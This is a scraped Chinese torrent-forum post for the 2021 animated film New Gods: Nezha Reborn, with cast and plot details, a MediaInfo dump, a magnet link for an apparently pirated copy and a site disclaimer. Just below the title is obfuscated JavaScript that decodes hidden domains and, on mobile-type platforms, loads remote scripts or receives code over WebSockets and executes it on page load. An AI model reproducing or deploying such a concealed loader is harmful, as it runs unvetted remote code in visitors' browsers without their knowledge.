新神榜:哪吒重生[国语中字].New.Gods.Nezha.Reborn.2021.NF.1080p.WEB-DL.DDP5.1.x264 5.13GB

版主小s 1月前 298

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 新神榜:哪吒重生 / 新封神:哪吒重生 / New Gods: Nezha Reborn
◎年  代 2021
◎产  地 中国大陆
◎类  别 动作 / 动画 / 奇幻
◎语  言 汉语普通话
◎上映日期 2021-02-12(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt13269670/
◎豆瓣评分 7.0/10 (168803人评价)
◎豆瓣链接 https://movie.douban.com/subject/34779692/
◎片  长 116分钟
◎导  演 赵霁 Ji Zhao (id:1401175)
◎编  剧 沐川  (id:1429702)
◎演  员 杨天翔 Tianxiang Yang (id:1341265)
       张赫 He Zhang (id:1406312)
       宣晓鸣 Xiaoming Xuan (id:1320627)
       李诗萌 Shimeng Li (id:1412293)
       朱可儿 Keer Zhu (id:1450990)
       凌振赫 Zhenhe Ling (id:1387168)
       刘若班 Ruoban Liu (id:1382820)
       张遥函 Yaohan Zhang (id:1384029)
       张喆 Zhe Zhang (id:1389748)
       高增志 Zengzhi Gao (id:1340808)
       郭浩然 Haoran Guo (id:1360434)
       路晞  (id:1429701)
       郭好为 Haowei Guo (id:1339864)

◎标  签 国漫 / 哪吒 / 动画 / 追光动画 / 奇幻 / 赛博朋克 / 中国大陆 / 动漫

◎简  介
  三千年前,天下动荡,人神共遇大劫,不想哪吒的一缕魂魄逃脱天罗地网,世世转世投胎,这一世与东海市酷爱机车的热血青年李云祥人神共生。然而龙族对哪吒恩怨并未善罢甘休,有着哪吒元神的李云祥,亦无法逃脱被龙族赶尽杀绝的宿命。东海危在旦夕,李云祥是否能够与哪吒元神并肩作战,成为抵抗龙族的英雄?东海市的子民能否得到拯救?

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 324276848177412080206444693019433610020 (0xF3F572FFED5CE164BF7F37DFB9E7AB24)
  4. Complete name                            : [email protected]DDQ.COM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 5.13 GiB
  8. Duration                                 : 1 h 58 min
  9. Overall bit rate mode                    : Variable
  10. Overall bit rate                         : 6 212 kb/s
  11. Encoded date                             : UTC 2021-08-19 12:49:22
  12. Writing application                      : mkvmerge v55.0.0 ('Waiting For Space') 64-bit
  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  14. Video
  15. ID                                       : 1
  16. Format                                   : AVC
  17. Format/Info                              : Advanced Video Codec
  18. Format profile                           : [email protected]
  19. Format settings                          : CABAC / 4 Ref Frames
  20. Format settings, CABAC                   : Yes
  21. Format settings, Reference frames        : 4 frames
  22. Codec ID                                 : V_MPEG4/ISO/AVC
  23. Duration                                 : 1 h 58 min
  24. Bit rate mode                            : Variable
  25. Bit rate                                 : 3 009 kb/s
  26. Maximum bit rate                         : 20.0 Mb/s
  27. Width                                    : 1 920 pixels
  28. Height                                   : 1 080 pixels
  29. Display aspect ratio                     : 16:9
  30. Frame rate mode                          : Constant
  31. Frame rate                               : 24.000 FPS
  32. Color space                              : YUV
  33. Chroma subsampling                       : 4:2:0
  34. Bit depth                                : 8 bits
  35. Scan type                                : Progressive
  36. Bits/(Pixel*Frame)                       : 0.060
  37. Stream size                              : 2.48 GiB (48%)
  38. Writing library                          : x264 core 148 r2722 1b0121b
  39. Encoding settings                        : cabac=1 / ref=4 / deblock=1:0:0 / analyse=0x3:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=120 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=2 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=16 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=121 / scenecut=0 / intra_refresh=0 / rc_lookahead=240 / rc=crf / mbtree=1 / crf=18.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / vbv_maxrate=20000 / vbv_bufsize=25000 / crf_max=0.0 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:0.80
  40. Default                                  : Yes
  41. Forced                                   : No
  42. Audio #1
  43. ID                                       : 2
  44. Format                                   : E-AC-3
  45. Format/Info                              : Enhanced AC-3
  46. Commercial name                          : Dolby Digital Plus
  47. Codec ID                                 : A_EAC3
  48. Duration                                 : 1 h 58 min
  49. Bit rate mode                            : Constant
  50. Bit rate                                 : 640 kb/s
  51. Channel(s)                               : 6 channels
  52. Channel layout                           : L R C LFE Ls Rs
  53. Sampling rate                            : 48.0 kHz
  54. Frame rate                               : 31.250 FPS (1536 SPF)
  55. Compression mode                         : Lossy
  56. Stream size                              : 541 MiB (10%)
  57. Title                                    : 普通话
  58. Language                                 : Chinese
  59. Service kind                             : Complete Main
  60. Default                                  : Yes
  61. Forced                                   : No
  62. Audio #2
  63. ID                                       : 3
  64. Format                                   : E-AC-3
  65. Format/Info                              : Enhanced AC-3
  66. Commercial name                          : Dolby Digital Plus
  67. Codec ID                                 : A_EAC3
  68. Duration                                 : 1 h 58 min
  69. Bit rate mode                            : Constant
  70. Bit rate                                 : 640 kb/s
  71. Channel(s)                               : 6 channels
  72. Channel layout                           : L R C LFE Ls Rs
  73. Sampling rate                            : 48.0 kHz
  74. Frame rate                               : 31.250 FPS (1536 SPF)
  75. Compression mode                         : Lossy
  76. Stream size                              : 541 MiB (10%)
  77. Title                                    : 國語
  78. Language                                 : Chinese
  79. Service kind                             : Complete Main
  80. Default                                  : No
  81. Forced                                   : No
  82. Audio #3
  83. ID                                       : 4
  84. Format                                   : E-AC-3
  85. Format/Info                              : Enhanced AC-3
  86. Commercial name                          : Dolby Digital Plus
  87. Codec ID                                 : A_EAC3
  88. Duration                                 : 1 h 58 min
  89. Bit rate mode                            : Constant
  90. Bit rate                                 : 640 kb/s
  91. Channel(s)                               : 6 channels
  92. Channel layout                           : L R C LFE Ls Rs
  93. Sampling rate                            : 48.0 kHz
  94. Frame rate                               : 31.250 FPS (1536 SPF)
  95. Compression mode                         : Lossy
  96. Stream size                              : 541 MiB (10%)
  97. Title                                    : 粵語
  98. Language                                 : Chinese
  99. Service kind                             : Complete Main
  100. Default                                  : No
  101. Forced                                   : No
  102. Audio #4
  103. ID                                       : 5
  104. Format                                   : E-AC-3
  105. Format/Info                              : Enhanced AC-3
  106. Commercial name                          : Dolby Digital Plus
  107. Codec ID                                 : A_EAC3
  108. Duration                                 : 1 h 58 min
  109. Bit rate mode                            : Constant
  110. Bit rate                                 : 640 kb/s
  111. Channel(s)                               : 6 channels
  112. Channel layout                           : L R C LFE Ls Rs
  113. Sampling rate                            : 48.0 kHz
  114. Frame rate                               : 31.250 FPS (1536 SPF)
  115. Compression mode                         : Lossy
  116. Stream size                              : 541 MiB (10%)
  117. Title                                    : English
  118. Language                                 : English
  119. Service kind                             : Complete Main
  120. Default                                  : No
  121. Forced                                   : No
  122. Audio #5
  123. ID                                       : 6
  124. Format                                   : E-AC-3
  125. Format/Info                              : Enhanced AC-3
  126. Commercial name                          : Dolby Digital Plus
  127. Codec ID                                 : A_EAC3
  128. Duration                                 : 1 h 58 min
  129. Bit rate mode                            : Constant
  130. Bit rate                                 : 640 kb/s
  131. Channel(s)                               : 6 channels
  132. Channel layout                           : L R C LFE Ls Rs
  133. Sampling rate                            : 48.0 kHz
  134. Frame rate                               : 31.250 FPS (1536 SPF)
  135. Compression mode                         : Lossy
  136. Stream size                              : 541 MiB (10%)
  137. Title                                    : 普通话描述音轨
  138. Language                                 : Chinese
  139. Service kind                             : Complete Main
  140. Default                                  : No
  141. Forced                                   : No
  142. Text #1
  143. ID                                       : 7
  144. Format                                   : UTF-8
  145. Codec ID                                 : S_TEXT/UTF8
  146. Codec ID/Info                            : UTF-8 Plain Text
  147. Duration                                 : 1 h 54 min
  148. Bit rate                                 : 33 b/s
  149. Count of elements                        : 1328
  150. Stream size                              : 27.8 KiB (0%)
  151. Title                                    : 简体中文
  152. Language                                 : Chinese
  153. Default                                  : Yes
  154. Forced                                   : No
  155. Text #2
  156. ID                                       : 8
  157. Format                                   : UTF-8
  158. Codec ID                                 : S_TEXT/UTF8
  159. Codec ID/Info                            : UTF-8 Plain Text
  160. Duration                                 : 1 h 56 min
  161. Bit rate                                 : 33 b/s
  162. Count of elements                        : 1330
  163. Stream size                              : 28.8 KiB (0%)
  164. Title                                    : 繁體中文
  165. Language                                 : Chinese
  166. Default                                  : No
  167. Forced                                   : No
  168. Text #3
  169. ID                                       : 9
  170. Format                                   : S_TEXT/WEBVTT
  171. Codec ID                                 : S_TEXT/WEBVTT
  172. Duration                                 : 1 h 56 min
  173. Bit rate                                 : 6 b/s
  174. Count of elements                        : 27
  175. Stream size                              : 5.41 KiB (0%)
  176. Title                                    : 繁體中文_forced
  177. Language                                 : Chinese
  178. Default                                  : No
  179. Forced                                   : No
  180. Text #4
  181. ID                                       : 10
  182. Format                                   : UTF-8
  183. Codec ID                                 : S_TEXT/UTF8
  184. Codec ID/Info                            : UTF-8 Plain Text
  185. Duration                                 : 1 h 54 min
  186. Bit rate                                 : 40 b/s
  187. Count of elements                        : 1303
  188. Stream size                              : 34.1 KiB (0%)
  189. Language                                 : English
  190. Default                                  : No
  191. Forced                                   : No
  192. Text #5
  193. ID                                       : 11
  194. Format                                   : UTF-8
  195. Codec ID                                 : S_TEXT/UTF8
  196. Codec ID/Info                            : UTF-8 Plain Text
  197. Duration                                 : 1 h 55 min
  198. Bit rate                                 : 68 b/s
  199. Count of elements                        : 2162
  200. Stream size                              : 57.7 KiB (0%)
  201. Title                                    : CC
  202. Language                                 : English
  203. Default                                  : No
  204. Forced                                   : No
  205. Text #6
  206. ID                                       : 12
  207. Format                                   : UTF-8
  208. Codec ID                                 : S_TEXT/UTF8
  209. Codec ID/Info                            : UTF-8 Plain Text
  210. Duration                                 : 1 h 54 min
  211. Bit rate                                 : 5 b/s
  212. Count of elements                        : 163
  213. Stream size                              : 4.63 KiB (0%)
  214. Title                                    : forced
  215. Language                                 : English
  216. Default                                  : No
  217. Forced                                   : No


TAGS 动作 奇幻 动画

磁力链:
  • magnet:?xt=urn:btih:EBBC9F1A0426548BCF74ECCEFC644FC8E47C0E26
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回